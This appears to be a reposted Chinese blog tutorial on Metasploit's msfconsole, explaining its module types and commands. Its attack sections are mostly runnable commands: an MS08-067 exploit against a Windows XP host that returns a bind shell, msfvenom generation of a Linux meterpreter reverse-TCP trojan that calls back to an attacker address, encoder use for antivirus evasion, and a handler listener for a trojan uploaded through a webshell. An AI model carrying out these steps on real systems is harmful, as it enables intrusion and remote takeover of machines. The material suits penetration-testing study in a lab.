前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >msfconsole模块_msfconsole下载

msfconsole模块_msfconsole下载

作者头像
全栈程序员站长
发布2022-10-04 14:07:58
2980
发布2022-10-04 14:07:58
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。 exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针 对目标主机被动的监听然后获得相应的操作。 Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。

一、Msfconsole相关参数

1、use参数

这个是使用参数。如你要使用到某个利用模块,payload等,那么就要使用到use参数 使用漏洞 use 你选择的利用模块

2、Show参数

这个命令用的很多。请一定认真看。如果单纯的输入show,那么就会显示出所有的payload,利用模块,post模块,插件等等。但是一般我们都不这么使用。如果要显示利用模块,那么就输入show exploits。如果要显示payload,那么就输入show payloads。 展示可用载荷show payloads 查看还需要设置的选项 show options,为YES且空的就是还需要我们设置的。 可以看到下图中RHOST参数还未设置内容

3、Set参数

这个主要是对payload或者其他模块进行设置。比如设置攻击目标的IP就是set RHOST 10.1.7.90

二、MSF的六个模块:exploit,encoder,payload,aux,post,nops

1、exploit——渗透攻击模块(run)

测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。 exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针 对目标主机被动的监听然后获得相应的操作。 Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。

2、encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等

在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。如: generic/none normal The “none” Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder

3、payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成

我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上执行有限命令的程序。

4、aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测激活成功教程、敏感信息嗅探等

5、post——后渗透攻击模块

6、nops——空指令模块,用以产生缓冲区填充的非操作性指令

三、攻击靶机并获取shell

常用exploit,payload设置参数 show exploit——显示Metasploit中所有渗透攻击模块 show playload——查看所有活动状态的攻击载荷

代码语言:javascript
复制
  被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 
  攻击者IP地址:192.168.120.130
1.//查找ms08_067漏洞

msf > search ms08_067

2、//使用MS08_067漏洞

use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接

set RHOST 192.168.120.131

4、//设置ShellCode

set payload windows/shell_bind_tcp

5、//显示配置的选项

show options

6、//expliot攻击–>成功返回shell

四、监听模块,使用木马文件Getshell

1、通过msfvenom生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.1.7.99 LPORT=8889 -f elf >/root/sa.elf

2、用kali开启监听,并在菜刀的虚拟终端上运行木马
代码语言:javascript
复制
注:生成的木马上传至目标网站并虚拟终端远程运行

use exploit/multi/handler 使用handler模块 set payload linux/x64/meterpreter/reverse_tcp payload 配置payload set LHOST 10.1.7.90 set LPORT 8889 run

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月6日 下,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、Msfconsole相关参数
    • 1、use参数
      • 2、Show参数
        • 3、Set参数
        • 二、MSF的六个模块:exploit,encoder,payload,aux,post,nops
          • 1、exploit——渗透攻击模块(run)
            • 2、encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等
              • 3、payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成
                • 4、aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测激活成功教程、敏感信息嗅探等
                  • 5、post——后渗透攻击模块
                    • 6、nops——空指令模块,用以产生缓冲区填充的非操作性指令
                      • 1.//查找ms08_067漏洞
                      • 2、//使用MS08_067漏洞
                      • 3、//设置远程地址,正向连接
                      • 4、//设置ShellCode
                      • 5、//显示配置的选项
                      • 6、//expliot攻击–>成功返回shell
                      • 1、通过msfvenom生成木马
                      • 2、用kali开启监听,并在菜刀的虚拟终端上运行木马
                  • 三、攻击靶机并获取shell
                  • 四、监听模块,使用木马文件Getshell
                  领券
                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档